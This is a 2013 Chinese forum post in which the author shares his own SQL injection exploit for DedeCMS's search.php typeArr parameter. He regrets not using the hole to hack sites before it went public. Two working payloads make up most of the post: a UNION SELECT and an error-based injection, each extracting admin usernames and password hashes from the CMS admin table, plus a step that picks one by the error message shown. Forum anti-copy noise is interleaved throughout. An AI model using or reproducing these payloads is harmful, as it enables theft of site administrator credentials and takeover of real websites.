转载不加作者名的没JJ
- P( K& I7 |5 X) }% y) k
: H( F7 d0 O8 v3 T4 g0 F哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
' B* G* i: U6 [6 u/ B6 M: X
3 e- m3 M: g/ q7 D: n0 `既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
% g9 m8 f2 q; p3 g C- o( b
! C) z7 G3 b5 ^3 N' J我一般是这样测试的:
% ~' m& A- J/ D' a6 u5 T
# _+ C* c+ h" k9 X0 E4 o提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
; z0 n" t" U3 y% V2 q: p' y5 s) D ~7 a" v$ W$ x! x
转载不加作者名的没JJ2 z2 c" ]& m* I6 v4 C8 }3 C
, M$ n0 _- _4 F. D8 w5 A3 m作者:鬼哥
$ t% a/ J3 D( T+ g: m1 s0 Z, O! S0 Q7 d8 E
* @) O0 X! F0 Y7 g- R1 }
2 |/ Q+ P$ n& n8 X5 i% K看结果如果提示
* g& A! o5 K" b, @# E+ }8 X, O8 d8 I" A7 h, L8 c; w
Safe Alert: Request Error step 2 !# D( ^# }# l$ Q
. l0 i6 Q( H5 K* B8 v3 t. P
那么直接用下面的exp
7 s& V& B% X' d. ?
9 X6 _4 O7 N1 O, ], Lxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
: |$ O/ i1 Y3 m$ ?$ }- {- l5 j$ a5 N0 g% o K
4 s) M7 k* r0 h; g6 w+ Q- l# B看结果如果提示
9 _, K# E( E0 m
: [# D. ^; @* S: B6 D" O5 a$ l+ FSafe Alert: Request Error step 1 !
' [7 J# R$ Y- p. H q% F" G: ]% k4 p$ l* L9 R2 }
那么直接用下面的exp+ r4 o2 c$ ?; y# Z7 c$ I* `
# E6 J& e7 R/ Cxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a/ Q! T: U( P4 ]
0 V, k) a7 c1 o. h2 s
2 r7 Z& M9 z2 n1 u; J如果正常显示证明漏洞不存在了。: s" i- l; V6 m" ]2 |4 ?' o' N( z _
/ m8 O& J, I d) Z转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对